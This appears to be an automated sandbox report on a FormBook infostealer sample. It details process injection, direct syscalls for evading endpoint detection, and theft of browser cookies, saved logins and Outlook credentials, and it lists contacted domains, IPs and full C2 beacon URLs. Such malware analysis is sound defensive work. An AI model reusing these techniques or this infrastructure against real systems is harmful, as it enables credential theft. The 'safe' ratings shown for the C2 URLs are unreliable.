            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]2_2_034BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]2_2_034C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]2_2_034C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC810 mov eax, dword ptr fs:[00000030h]2_2_034BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001D81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_001D81F7
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001AA364 SetUnhandledExceptionFilter,0_2_001AA364
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001AA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001AA395

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtQueryValueKey: Direct from: 0x76EF2BECJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtOpenKeyEx: Direct from: 0x76EF3C9CJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\F2024-202202.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\openfiles.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: NULL target: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: NULL target: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\openfiles.exeThread register set: target process: 5004Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\openfiles.exeThread APC queued: target process: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\F2024-202202.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2823008Jump to behavior
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001D8C93 LogonUserW,0_2_001D8C93
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_00183B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00183B4C
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_00184A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00184A35
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001E4EC9 mouse_event,0_2_001E4EC9
            Source: C:\Users\user\Desktop\F2024-202202.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\F2024-202202.exe"Jump to behavior
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exeProcess created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001D81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_001D81F7
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001E4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_001E4C03
            Source: F2024-202202.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: HCyQCFLUGWqlxNRVXC.exe, 00000004.00000000.2265154072.0000000001391000.00000002.00000001.00040000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000004.00000002.3253712582.0000000001391000.00000002.00000001.00040000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000006.00000000.2410459829.0000000000D21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: F2024-202202.exe, HCyQCFLUGWqlxNRVXC.exe, 00000004.00000000.2265154072.0000000001391000.00000002.00000001.00040000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000004.00000002.3253712582.0000000001391000.00000002.00000001.00040000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000006.00000000.2410459829.0000000000D21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: HCyQCFLUGWqlxNRVXC.exe, 00000004.00000000.2265154072.0000000001391000.00000002.00000001.00040000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000004.00000002.3253712582.0000000001391000.00000002.00000001.00040000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000006.00000000.2410459829.0000000000D21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: HCyQCFLUGWqlxNRVXC.exe, 00000004.00000000.2265154072.0000000001391000.00000002.00000001.00040000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000004.00000002.3253712582.0000000001391000.00000002.00000001.00040000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000006.00000000.2410459829.0000000000D21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001A886B cpuid 0_2_001A886B
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001B50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_001B50D7
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001C2230 GetUserNameW,0_2_001C2230
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001B418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_001B418A
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_00184AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00184AFE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3252950287.0000000002650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2345744782.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3254116085.00000000033E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3252870052.00000000005F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3255683162.0000000004AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3252524118.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2345390681.0000000003280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2345007571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\openfiles.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: F2024-202202.exeBinary or memory string: WIN_81
            Source: F2024-202202.exeBinary or memory string: WIN_XP
            Source: F2024-202202.exeBinary or memory string: WIN_XPe
            Source: F2024-202202.exeBinary or memory string: WIN_VISTA
            Source: F2024-202202.exeBinary or memory string: WIN_7
            Source: F2024-202202.exeBinary or memory string: WIN_8
            Source: F2024-202202.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3252950287.0000000002650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2345744782.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3254116085.00000000033E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3252870052.00000000005F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3255683162.0000000004AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3252524118.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2345390681.0000000003280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2345007571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001F6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_001F6596
            Source: C:\Users\user\Desktop\F2024-202202.exeCode function: 0_2_001F6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_001F6A5A

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		2
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		3
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS16
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		3
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets51
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1448090 Sample: F2024-202202.exe Startdate: 27/05/2024 Architecture: WINDOWS Score: 100 28 www.waldil.online 2->28 30 www.sweet777.work 2->30 32 3 other IPs or domains 2->32 42 Snort IDS alert for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Yara detected FormBook 2->46 48 3 other signatures 2->48 10 F2024-202202.exe 4 2->10         started        signatures3 process4 signatures5 60 Binary is likely a compiled AutoIt script file 10->60 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 HCyQCFLUGWqlxNRVXC.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 openfiles.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 2 other signatures 19->56 22 HCyQCFLUGWqlxNRVXC.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.kguyreoalpha.shop 43.132.225.97, 49717, 49718, 49719 LILLY-ASUS Japan 22->34 36 www.make-l.ru 194.58.112.174, 49713, 49714, 49715 AS-REGRU Russian Federation 22->36 38 www.goodroothealth.com 66.113.136.229, 49711, 80 AFFINITY-FTLUS United States 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            F2024-202202.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            www.goodroothealth.com0%VirustotalBrowse
            www.kguyreoalpha.shop0%VirustotalBrowse
            www.make-l.ru1%VirustotalBrowse
            www.waldil.online3%VirustotalBrowse
            www.sweet777.work1%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.make-l.ru/0so0/0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://www.kguyreoalpha.shop/0so0/0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://www.goodroothealth.com/0so0/?X430XLq0=CY1s0XH7bNWttwV9rZ4SbfagXQ6dqpRCQvxAN47rZ58SWMnAte1QXQdn29aNO6h1oK8GMPzGoaIoZ8sBEayCkb2ait1G89/ayPLVJ4jhwFoJQSPoL8Uww1rncwUMKC4qFA==&Wd=vjk8lhT0U40%Avira URL Cloudsafe
            http://www.kguyreoalpha.shop/0so0/?X430XLq0=ZXsyqv6OWO1jdfmZwPHK8dAntN05Z+dsmugw9BJBTbqyaa2WOVN+U2naZpjsCmE4tUAeXtTgCCsmM8Dup6ejRXHoa4TAR4CFgRPYrdUpMYgqMRztZg/3Zk7YYa9ZW1B17w==&Wd=vjk8lhT0U40%Avira URL Cloudsafe
